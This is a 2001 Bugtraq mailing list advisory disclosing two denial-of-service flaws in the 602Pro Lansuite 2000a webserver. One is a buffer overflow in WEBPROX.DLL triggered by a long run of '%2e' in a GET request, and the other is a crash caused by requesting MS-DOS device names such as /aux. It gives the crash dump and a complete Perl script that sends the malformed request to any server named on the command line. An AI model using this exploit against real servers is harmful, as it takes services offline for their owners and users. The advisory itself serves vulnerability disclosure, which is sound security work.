Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

602Pro Lansuite Denial Of Service 1.0.34

From: nitr0s () HOTMAIL COM
Date: Mon, 26 Mar 2001 11:58:27 -0000
Advisory Name:Lansuite Webserver Denial of Service
   Discovered:8th and 23rd Of March 2001
  Application:602Pro Lansuite 2000a 1.0.34 - prior 
versions and possibly 1.0.35
     Platform:Windows 2k,95/98/NT - others unknown
     Severity:Denial of service from application
       Credit:Liamer () eircom net
Vendor Status:Unknown - 
http://www.602software.com/

Description:

There are 2 problems, the first is a buffer overflow in 
WEBPROX.DLL and the other in relation to MS-DOS 
device files.Credit should be given to Gründl 
<peter.grundl () defcom com> who made me think of 
trying this same problem that he found in Alt-N 
Technologies MDaemon WebConfiguration feature 
which also affects Xitami Webserver 2.4b5 and 
probably a whole load of other windows server 
programs.

Demonstration:

Connect to the webserver and send the following 
request:

GET /%2e%2e%2e%2e.... /HTTP/1.0

Where %2e is over 157 times

The server depending on how many times %2e or [.] 
is sent will exit displaying the following error:

LANSUITE caused an invalid page fault in
module WEBPROX.DLL at 015f:008a1326.
Registers:
EAX=0000000a CS=015f EIP=008a1326 
EFLGS=00010216
EBX=00000008 SS=0167 ESP=05202848 
EBP=05202848
ECX=0000000a DS=0167 ESI=81648e38 FS=2c37
EDX=334f2b1f ES=0167 EDI=81623ff0 GS=0000
Bytes at CS:EIP:
8b 48 2c 83 e1 01 85 c9 74 2d 8b 55 08 c7 42 18 
Stack dump:
052029dc 00862e9a 0000000a 334f2b1f 000000fa 
81623ff0 81648e38 00000008 bff7b317 018d0000 
00000000 018d1650 018d1650 0520ace7 018d164c 
052028cc 


The other problem is requesting MS-DOS device 
files, send the following request to the webserver on 
port 80

GET /aux

---------------------------------------------------------------
#!/usr/bin/perl
#
# 602Pro Lansuite 2000a 1.0.34 Denial Of Service
# 
# 
# Malformed GET request
# 
use Getopt::Std;
use Socket;

getopts('s:', \%args);
if(!defined($args{s})){&usage;}

my
($serv,$port,$foo,$number,$data,$buf,$in_addr,$padd
r,$proto);

$foo = "%2e";                         
$number = "160";                      
$data .= $foo x $number;
$serv = $args{s};       
$port =  80;            
$buf = "GET /$data /HTTP/1.0\r\n\r\n";

$in_addr = (gethostbyname($serv))[4] || die("Error: $!
\n");
$paddr = sockaddr_in($port, $in_addr) || die ("Error: $!
\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");

socket(S, PF_INET, SOCK_STREAM, $proto) || die
("Error: $!");
connect(S, $paddr) ||die ("Error: $!");
select(S); $| = 1; select(STDOUT);
print S "$buf";

print("Data has been successfully sent to $serv\n");

sub usage {die("\n\n$0 -s <server>\n\n");}
Previous By Date Next
Previous By Thread Next

Current thread: